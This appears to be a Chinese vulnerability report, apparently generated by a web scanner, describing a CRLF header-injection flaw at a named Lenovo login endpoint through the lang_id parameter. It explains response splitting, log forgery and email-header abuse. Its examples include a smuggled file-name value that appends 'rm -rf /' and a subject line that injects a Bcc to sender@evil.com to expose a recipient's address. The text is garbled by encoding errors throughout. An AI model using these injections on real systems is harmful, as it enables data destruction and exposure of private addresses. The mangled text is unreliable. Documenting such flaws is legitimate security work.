簡要描述:
它是一個遠程攻擊者可能注入自定義HTTP標頭����。
攻擊者可以注入會話cookie或HTML代碼。
這可能進行的XSS(跨站點腳本)或會話固定漏洞�。
詳細說明:
URL編碼的輸入lang_id設(shè)置SomeCustomInjectedHeader:injected_by_wvs
注入頭發(fā)現(xiàn):
SomeCustomInjectedHeader:injected_by_wvs
HTTP標頭結(jié)構(gòu)“鍵:值”�,其中每行由CRLF組合分離��。
如果用戶輸入的值部分不正確轉(zhuǎn)義/刪除CRLF字符注入有可能改變了HTTP頭結(jié)構(gòu)��。
HTTP響應(yīng)拆分是一個新的應(yīng)用程序的攻擊技術(shù)��,使各種新的攻擊�,如Web緩存中毒,跨用戶涂改�,劫持用戶的敏感信息和XSS的網(wǎng)頁。
攻擊者發(fā)送一個HTTP請求��,迫使Web服務(wù)器��,以形成一個輸出流��,然后將其解釋為兩個HTTP響應(yīng)�,而不是一個響應(yīng)目標。
攻擊者在搜索安全漏洞的時候沒有忽略很少使用的CRLF.攻擊者可以通過在一段數(shù)據(jù)中加入CRLF命令來改變接受這個數(shù)據(jù)的應(yīng)用程序處理這個數(shù)據(jù)的方式�,從而執(zhí)行CFRL注入攻擊。
CRLF攻擊最基本的例子包括向記錄文件中增加偽造的記錄�。也就是說,有安全漏洞的應(yīng)用程序把一個用戶輸入的內(nèi)容寫到系統(tǒng)記錄文件中�。攻擊者可以提供如下輸入內(nèi)容:
Testing123MYSQL DATABASE ERROR:TABLE CORRUPTION
當系統(tǒng)管理員在早上查看他的紀錄時,他可能會用很多時間排除一個根本就不存在的故障�。狡猾的攻擊者在攻擊系統(tǒng)的另一部分時�����,可以使用這種特洛伊木馬分散管理員的注意力�。
想像一下���,一個應(yīng)用程序收到用戶輸入的一個文件名���,然后對那個文件執(zhí)行一個指令,如“l(fā)s -a .”��。如果這個應(yīng)用程序存在CRLF安全漏洞�,攻擊者就可以輸入這樣的內(nèi)容:
File.txtrm -rf /
這個有安全漏洞的應(yīng)用程序就會執(zhí)行這個命令“l(fā)s -a File.txt”,然后再執(zhí)行這個命令“rm -rf /”���。如果這個應(yīng)用程序是一個根程序����,這可能就是它執(zhí)行的最后一個命令�,因為在根分區(qū)的全部文件都被刪除了�����。
考慮使用一種CRFL注入攻擊暴露使用一種基于網(wǎng)絡(luò)的匿名電子郵件系統(tǒng)的某個人的電子郵件地址。那個電子郵件系統(tǒng)的工作方式可能是這樣的:電子郵件的發(fā)送者用他們的電子郵件地址����、信息主題和信息本身填寫一個表格。當這個表格遞交到網(wǎng)絡(luò)服務(wù)器上的時候�,網(wǎng)絡(luò)服務(wù)器把這個表格轉(zhuǎn)換為一個SMTP電子郵件,并且發(fā)送給收件人�。發(fā)送者永遠不會看到收件人的電子郵件地址。這個地址只有服務(wù)器知道��。
如果這個應(yīng)用程序存在CRLF攻擊安全漏洞�����,電子郵件的發(fā)件人可以通過創(chuàng)建下面這樣的一行主題來破壞收件人的匿名性:
Subject:Peekaboo���,I see youBcc:sender@evil.com
當有安全漏洞的應(yīng)用程序得到這個數(shù)據(jù)的時候�,它向這個郵件的文件頭增加一個不需要的行���,創(chuàng)建一個發(fā)送到發(fā)件人郵件地址的這封郵件的盲送副本����。在這個副本中,“To:”地址是看不到的�����,因此把收件人的郵件地址暴露給發(fā)送者�����。
漏洞證明:
http//ips.lenovo.com.cn/loginByPeopleAction.do
攻擊者可以注入會話Cookie或HTML代碼�����。這種行為可能導致跨站腳本攻擊固定會話攻擊
問題是否嚴重��,請自行檢查�����,每一個細節(jié)都可能為攻擊者創(chuàng)造機會���。
公司動態(tài)
行業(yè)動態(tài)
企業(yè)動態(tài)
網(wǎng)絡(luò)熱點
QQ空間
新浪微博
開心網(wǎng)
人人網(wǎng)
